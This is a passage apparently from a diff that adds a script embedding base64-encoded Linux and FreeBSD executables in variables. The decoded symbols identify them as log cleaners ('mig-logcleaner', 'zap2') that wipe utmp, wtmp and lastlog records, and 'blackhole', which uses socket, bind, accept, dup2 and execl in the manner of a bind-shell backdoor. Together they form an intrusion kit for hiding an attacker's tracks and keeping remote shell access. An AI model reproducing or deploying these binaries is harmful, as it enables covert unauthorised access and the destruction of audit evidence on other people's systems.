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
+AAASAAAAJAMAAHyHBAg3AAAAEgAAADYDAACMhwQIgQAAACIAAABSAwAAnIcECD0AAAASAAAAYgMA
+AKyHBAgxAAAAEgAAAHMDAAC8hwQIPQEAABIAAACHAwAAzIcECPUAAAASAAAAlwMAANyHBAgnAAAA
+EgAAAKcDAABUyAQIAAAAABEA8f+uAwAAGMcECAAAAAARABMAxAMAAHjIBAgAAAAAEQDx/8kDAABc
+yAQIBAAAABEAFgDbAwAAJKgECAQAAAARAA4A6gMAAOyHBAgpAAAAEgAAAP0DAADgxgQIAAAAABAA
+DwAKBAAA/IcECD0AAAASAAAAGgQAAAAAAAAAAAAAIAAAACkEAAAMiAQIHwAAABIAAAAAaW5pdGZp
+bmkuYwBnY2MyX2NvbXBpbGVkLgBjYWxsX2dtb25fc3RhcnQAaW5pdC5jAGNydHN0dWZmLmMAcC4w
+AF9fRFRPUl9MSVNUX18AY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AF9fRUhfRlJB
+TUVfQkVHSU5fXwBmaW5pX2R1bW15AG9iamVjdC4yAGZyYW1lX2R1bW15AGluaXRfZHVtbXkAZm9y
+Y2VfdG9fZGF0YQBfX0NUT1JfTElTVF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5E
+X18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AbWlnLWxvZ2NsZWFuZXIuYwBsYXN0bG9nX2hv
+c3RuYW1lAGxhc3Rsb2dfdGltZQBsYXN0bG9nX3R0eQBhdG9sQEBHTElCQ18yLjAAY291bnRfcmVj
+b3JkcwBfRFlOQU1JQwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm9AQEdMSUJDXzIuMAB3cml0ZUBAR0xJ
+QkNfMi4wAHN0cmNtcEBAR0xJQkNfMi4wAHVzYWdlAGNsb3NlQEBHTElCQ18yLjAAX2ZwX2h3AGZw
+cmludGZAQEdMSUJDXzIuMABsAHN5c3RlbUBAR0xJQkNfMi4wAGFkZGQAX2luaXQAbWFsbG9jQEBH
+TElCQ18yLjAAdHh0X2NsZWFuAHJlbW92ZUBAR0xJQkNfMi4wAF9fZGVyZWdpc3Rlcl9mcmFtZV9p
+bmZvQEBHTElCQ18yLjAAc3Rkb3V0QEBHTElCQ18yLjAAc3RkZXJyQEBHTElCQ18yLjAAX3N0YXJ0
+AGdldG9wdEBAR0xJQkNfMi4wAGxhc3Rsb2dfY2xlYW4AcmVwbGFzZQBzdHJsZW5AQEdMSUJDXzIu
+MABjAHV0bXBfY2xlYW4AX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNf
+Mi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAAX2ZpbmkAbHNlZWtAQEdMSUJDXzIuMABt
+ZW1jcHlAQEdMSUJDXzIuMABfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4xLjMAb3BlbkBAR0xJQkNf
+Mi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHduYW1AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAA
+YXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABvcHRhcmdA
+QEdMSUJDXzIuMABfSU9fc3RkaW5fdXNlZABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0
+AHJlYWRAQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBzdHJjcHlAQEdMSUJDXzIuMAA=";
+
+$zap2="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAcIQECDQAAABEDAAAAAAAADQAIAAHACgAGwAYAAYAAAA0
+AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQIowkAAKMJAAAFAAAAABAAAAEAAACkCQAApJkECKSZBAgoAQAAMAEA
+AAYAAAAAEAAAAgAAALQJAAC0mQQItJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI
+IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s
+aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAAAMAAAAOAAAADQAAAAwA
+AAALAAAAAAAAAAAAAAABAAAAAAAAAAAAAAADAAAABAAAAAUAAAAGAAAAAgAAAAkAAAAIAAAABwAA
+AAoAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAB8AAAAEgAAAGcAAAAAAAAAcQAAABIAAABbAAAA
+AAAAAB0AAAASAAAAKQAAAAAAAACsAAAAEgAAAEkAAAAAAAAA1QAAABIAAAALAAAAAAAAACkAAAAS
+AAAAEgAAAAAAAAA8AAAAEgAAAGIAAAAAAAAAfAAAABIAAAAYAAAAAAAAADAAAAASAAAAMQAAAAAA
+AAD/AAAAEgAAADoAAABgiQQIBAAAABEADgAkAAAAAAAAAHwAAAASAAAAbQAAAAAAAAAAAAAAIAAA
+AABsaWJjLnNvLjYAcHJpbnRmAGxzZWVrAGJ6ZXJvAHdyaXRlAHJlYWQAc3RybmNtcABnZXRwd25h
+bQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBzdHJsZW4Ab3BlbgBjbG9zZQBfX2dt
+b25fc3RhcnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABAAEA
+AAAQAAAAAAAAABBpaQ0AAAIAfAAAAAAAAADImgQIBg0AAJyaBAgHAQAAoJoECAcCAACkmgQIBwMA
+AKiaBAgHBAAArJoECAcFAACwmgQIBwYAALSaBAgHBwAAuJoECAcIAAC8mgQIBwkAAMCaBAgHCgAA
+xJoECAcMAABVieWD7Ajo8QAAAOhMAQAA6G8FAADJwwD/NZSaBAj/JZiaBAgAAAAA/yWcmgQIaAAA
+AADp4P////8loJoECGgIAAAA6dD/////JaSaBAhoEAAAAOnA/////yWomgQIaBgAAADpsP////8l
+rJoECGggAAAA6aD/////JbCaBAhoKAAAAOmQ/////yW0mgQIaDAAAADpgP////8luJoECGg4AAAA
+6XD/////JbyaBAhoQAAAAOlg/////yXAmgQIaEgAAADpUP////8lxJoECGhQAAAA6UD///8x7V6J
+4YPk8FBUUmjYiAQIaJCIBAhRVmgaiAQI6G/////0kJBVieVT6AAAAABbgcPzFQAAUIuDOAAAAIXA
+dAL/0Itd/MnDkJBVieWD7AiAPcyaBAgAdSmhrJkECIsQhdJ0F4n2g8AEo6yZBAj/0qGsmQQIixCF
+0nXrxgXMmgQIAcnDifZVieWD7AihjJoECIXAdBm4AAAAAIXAdBCD7AxojJoECOjnevv3g8QQycOQ
+kFWJ5YHsiAEAAIPsCGoCaGSJBAjo+P7//4PEEKPQmgQIgz3QmgQIAA+IsgAAAIPsBGiAAQAAjYV4
+/v//UP810JoECOj5/v//g8QQhcB/Aut+g+wM/3UI6GX+//+DxBCJwo2FeP7//4PALIPsBFL/dQhQ
+6Fr+//+DxBCFwHWwg+wIaIABAACNhXj+//9Q6I/+//+DxBCD7ARqAWiA/v///zXQmgQI6Ff+//+D
+xBCD7ARogAEAAI2FeP7//1D/NdCaBAjo2v3//4PEEOlf////g+wM/zXQmgQI6NT9//+DxBDJw1WJ
+5YHsmAEAAMeFdP7//wEAAACD7AhqAmhuiQQI6A3+//+DxBCj0JoECIM90JoECAAPiBMBAACDvXT+
+////dQXp9AAAAIPsBGoCi5V0/v//idDR4AHQweAH99hQ/zXQmgQI6Lj9//+DxBCD7ARogAEAAI2F
+eP7//1D/NdCaBAjo2/3//4PEEIXAeQzHhXT+////////66CD7Az/dQjoPf3//4PEEInCjYV4/v//
+g8Asg+wEUv91CFDoMv3//4PEEIXAdWiD7AhogAEAAI2FeP7//1DoZ/3//4PEEIPsBGoCi5V0/v//
+idDR4AHQweAH99hQ/zXQmgQI6CL9//+DxBCD7ARogAEAAI2FeP7//1D/NdCaBAjopfz//4PEEMeF
+dP7////////pC////42FdP7///8A6f7+//+D7Az/NdCaBAjoiPz//4PEEMnDVYnlgexIAQAAg+wM
+/3UI6O/8//+DxBCJRfSDffQAD4SUAAAAg+wIagJofIkECOiw/P//g8QQo9CaBAiDPdCaBAgAD4iD
+AAAAg+wEagCLRfSLUAiJ0MHgAwHQweADAdDB4AJQ/zXQmgQI6GX8//+DxBCD7AhoJAEAAI2FuP7/
+/1Dobvz//4PEEIPsBGgkAQAAjYW4/v//UP810JoECOjR+///g8QQg+wM/zXQmgQI6ND7//+DxBDr
+E4PsCP91CGiNiQQI6Pv7//+DxBDJw1WJ5YPsCIPk8LgAAAAAKcSDfQgCdUuD7AyLRQyDwAT/MOgN
+////g8QQg+wMi0UMg8AE/zDorv3//4PEEIPsDItFDIPABP8w6Lr8//+DxBCD7AxolIkECOia+///
+g8QQ6xCD7Axom4kECOiI+///g8QQycOQkJBVieVXVlOD7AzoAAAAAFuBw/IRAADo7vr//42TFP//
+/42LFP///ynKMfbB+gI51nMPideQ/5SzFP///0Y5/nL0g8QMW15fycNVieVWU+gAAAAAW4HDrhEA
+AI2LFP///42DFP///ynBwfkChcmNcf91C+g6AAAAW17Jw4n2/5SzFP///4nyToXSdfLr5VWJ5VNS
+oXyaBAiD+P+7fJoECHQMg+sE/9CLA4P4/3X0WFvJw1WJ5VPoAAAAAFuBw0cRAABS6GL7//+LXfzJ
+wwADAAAAAQACAC9ldGMvdXRtcAAvdXNyL2FkbS93dG1wAC91c3IvYWRtL2xhc3Rsb2cAJXM6ID8K
+AFphcDIhCgBFcnJvci4KAAAAAAAAAAAAAIiaBAgAAAAAAQAAAAEAAAAMAAAAmIMECA0AAABAiQQI
+BAAAAEiBBAgFAAAAdIIECAYAAACUgQQICgAAAIYAAAALAAAAEAAAABUAAAAAAAAAAwAAAJCaBAgC
+AAAAWAAAABQAAAARAAAAFwAAAECDBAgRAAAAOIMECBIAAAAIAAAAEwAAAAgAAAD+//9vGIMECP//
+/28BAAAA8P//b/qCBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAD/////AAAAAP////8AAAAAAAAAALSZBAgAAAAAAAAAAMaDBAjWgwQI5oMECPaDBAgGhAQI
+FoQECCaEBAg2hAQIRoQECFaEBAhmhAQIAAAAAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA
+R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH
+Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD
+QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRl
+cnAALm5vdGUuQUJJLXRhZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUu
+dmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0AC5pbml0AC50ZXh0AC5maW5pAC5yb2RhdGEALmRh
+dGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmpjcgAuZ290AC5ic3MALmNvbW1l
+bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAA
+FIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAA
+AAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAEwAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsA
+AAACAAAAlIEECJQBAADgAAAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAAHSCBAh0AgAAhgAA
+AAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAAD6ggQI+gIAABwAAAAEAAAAAAAAAAIAAAACAAAA
+VAAAAP7//28CAAAAGIMECBgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAADiDBAg4
+AwAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAABAgwQIQAMAAFgAAAAEAAAACwAAAAQA
+AAAIAAAAdQAAAAEAAAAGAAAAmIMECJgDAAAXAAAAAAAAAAAAAAAEAAAAAAAAAHAAAAABAAAABgAA
+ALCDBAiwAwAAwAAAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAABwhAQIcAQAANAEAAAAAAAA
+AAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAQIkECEAJAAAbAAAAAAAAAAAAAAAEAAAAAAAAAIcAAAAB
+AAAAAgAAAFyJBAhcCQAARwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAMAAACkmQQIpAkAAAwA
+AAAAAAAAAAAAAAQAAAAAAAAAlQAAAAEAAAACAAAAsJkECLAJAAAEAAAAAAAAAAAAAAAEAAAAAAAA
+AJ8AAAAGAAAAAwAAALSZBAi0CQAAyAAAAAUAAAAAAAAABAAAAAgAAACoAAAAAQAAAAMAAAB8mgQI
+fAoAAAgAAAAAAAAAAAAAAAQAAAAAAAAArwAAAAEAAAADAAAAhJoECIQKAAAIAAAAAAAAAAAAAAAE
+AAAAAAAAALYAAAABAAAAAwAAAIyaBAiMCgAABAAAAAAAAAAAAAAABAAAAAAAAAC7AAAAAQAAAAMA
+AACQmgQIkAoAADwAAAAAAAAAAAAAAAQAAAAEAAAAwAAAAAgAAAADAAAAzJoECMwKAAAIAAAAAAAA
+AAAAAAAEAAAAAAAAAMUAAAABAAAAAAAAAAAAAADMCgAAqAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA
+AwAAAAAAAAAAAAAAdAsAAM4AAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAHwQAAAg
+BQAAGgAAACsAAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAACcFQAA9gIAAAAAAAAAAAAAAQAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAABSBBAgAAAAAAwABAAAAAAAogQQIAAAAAAMAAgAAAAAASIEE
+CAAAAAADAAMAAAAAAJSBBAgAAAAAAwAEAAAAAAB0ggQIAAAAAAMABQAAAAAA+oIECAAAAAADAAYA
+AAAAABiDBAgAAAAAAwAHAAAAAAA4gwQIAAAAAAMACAAAAAAAQIMECAAAAAADAAkAAAAAAJiDBAgA
+AAAAAwAKAAAAAACwgwQIAAAAAAMACwAAAAAAcIQECAAAAAADAAwAAAAAAECJBAgAAAAAAwANAAAA
+AABciQQIAAAAAAMADgAAAAAApJkECAAAAAADAA8AAAAAALCZBAgAAAAAAwAQAAAAAAC0mQQIAAAA
+AAMAEQAAAAAAfJoECAAAAAADABIAAAAAAISaBAgAAAAAAwATAAAAAACMmgQIAAAAAAMAFAAAAAAA
+kJoECAAAAAADABUAAAAAAMyaBAgAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwAAAAAAAAAAAAAAAAAD
+ABgAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAMAGgABAAAAlIQECAAAAAACAAwAEQAAAAAA
+AAAAAAAABADx/xwAAAB8mgQIAAAAAAEAEgAqAAAAhJoECAAAAAABABMAOAAAAIyaBAgAAAAAAQAU
+AEUAAACsmQQIAAAAAAEADwBJAAAAzJoECAEAAAABABYAVQAAALiEBAgAAAAAAgAMAGsAAAD0hAQI
+AAAAAAIADAARAAAAAAAAAAAAAAAEAPH/dwAAAICaBAgAAAAAAQASAIQAAACImgQIAAAAAAEAEwCR
+AAAAsJkECAAAAAABABAAnwAAAIyaBAgAAAAAAQAUAKsAAAAciQQIAAAAAAIADADBAAAAAAAAAAAA
+AAAEAPH/yAAAALSZBAgAAAAAEQARANEAAADQmgQIBAAAABEAFgDTAAAAAAAAAHwAAAASAAAA5AAA
+AAAAAABxAAAAEgAAAPUAAABciQQIBAAAABEADgD8AAAApJkECAAAAAAQAvH/DQEAACCFBAjhAAAA
+EgAMABcBAAComQQIAAAAABECDwAkAQAA2IgECEQAAAASAAwANAEAAJiDBAgAAAAAEgAKADoBAABw
+hAQIAAAAABIADABBAQAAAAAAAB0AAAASAAAAUwEAAAAAAACsAAAAEgAAAGYBAACkmQQIAAAAABAC
+8f95AQAAkIgECEgAAAASAAwAiQEAAMyaBAgAAAAAEADx/5UBAAAaiAQIcwAAABIADACaAQAAAAAA
+ANUAAAASAAAAtwEAAKSZBAgAAAAAEALx/8gBAACkmQQIAAAAACAADwDTAQAAAAAAACkAAAASAAAA
+5QEAAECJBAgAAAAAEgANAOsBAAAAAAAAPAAAABIAAAD8AQAApJkECAAAAAAQAvH/EAIAAAAAAAB8
+AAAAEgAAACACAAAAAAAAMAAAABIAAAAxAgAAAAAAAP8AAAASAAAARQIAAMyaBAgAAAAAEADx/0wC
+AACQmgQIAAAAABEAFQBiAgAA1JoECAAAAAAQAPH/ZwIAAKSZBAgAAAAAEALx/3oCAABgiQQIBAAA
+ABEADgCJAgAAAYYECEwBAAASAAwAkwIAAKSZBAgAAAAAEAAPAKACAAAAAAAAAAAAACAAAAC0AgAA
+pJkECAAAAAAQAvH/ygIAAAAAAAB8AAAAEgAAANoCAABNhwQIzQAAABIADADnAgAAAAAAAAAAAAAg
+AAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1Rf
+XwBfX0pDUl9MSVNUX18AcC4wAGNvbXBsZXRlZC4xAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFt
+ZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5E
+X18AX19kb19nbG9iYWxfY3RvcnNfYXV4AHphcDIuYwBfRFlOQU1JQwBmAHdyaXRlQEBHTElCQ18y
+LjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAX19maW5pX2FycmF5X2VuZABraWxsX3V0bXAAX19k
+c29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfaW5pdABfc3RhcnQAc3RybGVuQEBHTElCQ18yLjAA
+c3RybmNtcEBAR0xJQkNfMi4wAF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19i
+c3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9l
+bmQAZGF0YV9zdGFydABwcmludGZAQEdMSUJDXzIuMABfZmluaQBsc2Vla0BAR0xJQkNfMi4wAF9f
+cHJlaW5pdF9hcnJheV9lbmQAb3BlbkBAR0xJQkNfMi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHdu
+YW1AQEdMSUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2Fy
+cmF5X3N0YXJ0AF9JT19zdGRpbl91c2VkAGtpbGxfd3RtcABfX2RhdGFfc3RhcnQAX0p2X1JlZ2lz
+dGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAcmVhZEBAR0xJQkNfMi4wAGtpbGxfbGFz
+dGxvZwBfX2dtb25fc3RhcnRfXwA=";
+
+$blackhole="f0VMRgEBAQkAAAAAAAAAAAIAAwABAAAARIYECDQAAACgDQAAAAAAADQAIAAGACgAGAAVAAYAAAA0
+AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBkAAAAZAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQIAAsAAAALAAAFAAAAABAAAAEAAAAACwAAAJsECACbBAgEAQAAIAEA
+AAYAAAAAEAAAAgAAABALAAAQmwQIEJsECJgAAACYAAAABgAAAAQAAAAEAAAAEAEAABCBBAgQgQQI
+GAAAABgAAAAEAAAABAAAAC91c3IvbGliZXhlYy9sZC1lbGYuc28uMQAAAAAIAAAABAAAAAEAAABG
+cmVlQlNEAESCBwARAAAAHQAAAAAAAAAWAAAAFwAAABwAAAAaAAAAAAAAAA4AAAARAAAAFAAAABsA
+AAAIAAAAEwAAAAEAAAAZAAAADAAAABUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA
+AAUAAAACAAAAAAAAAAAAAAAHAAAAAAAAAAYAAAALAAAAAAAAAAoAAAAAAAAADQAAAAAAAAAQAAAA
+AAAAAA8AAAASAAAAAAAAABgAAAADAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAESFBAgA
+AAAAEgAAABIAAABUhQQILwAAABIAAAAZAAAAEJsECAAAAAARAPH/IgAAAGSFBAh9AAAAEgAAACgA
+AAB0hQQIAAAAABIAAAAtAAAAhIUECAAAAAASAAAANAAAAJSFBAgAAAAAEgAAADoAAACkhQQIMAAA
+ABIAAAA/AAAAKIUECAAAAAASAAcARQAAALSFBAgAAAAAEgAAAEwAAAAcnAQIBAAAABEAEgBUAAAA
+xIUECAAAAAASAAAAWQAAAAAAAAAAAAAAIAAAAOkAAAAgnAQIAAAAABAA8f9xAAAAAJsECAQAAAAR
+AAwAfAAAANSFBAhwAAAAEgAAAIMAAADkhQQIAAAAABIAAACKAAAA9IUECAAAAAASAAAA3AAAAASc
+BAgAAAAAEADx/48AAADwiQQIAAAAABIACgCVAAAABIYECEwBAAASAAAA1QAAAAScBAgAAAAAEADx
+/5wAAAC4mwQIAAAAABEA8f/oAAAAIJwECAAAAAAQAPH/lwAAABSGBAhbAAAAEgAAALIAAAAkhgQI
+AAAAABIAAAC5AAAAAAAAAAAAAAAgAAAAzwAAADSGBAgAAAAAEgAAAABsaWJjLnNvLjQAc3RyY3B5
+AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABiemVybwBzZW5kAF9pbml0AGFjY2Vw
+dABlbnZpcm9uAGJpbmQAX19kZXJlZ2lzdGVyX2ZyYW1lX2luZm8AX19wcm9nbmFtZQBzaWduYWwA
+bGlzdGVuAGZvcmsAX2ZpbmkAYXRleGl0AF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBzdHJsZW4AX19y
+ZWdpc3Rlcl9mcmFtZV9pbmZvAGNsb3NlAF9lZGF0YQBfX2Jzc19zdGFydABfZW5kAAAAAMSbBAgH
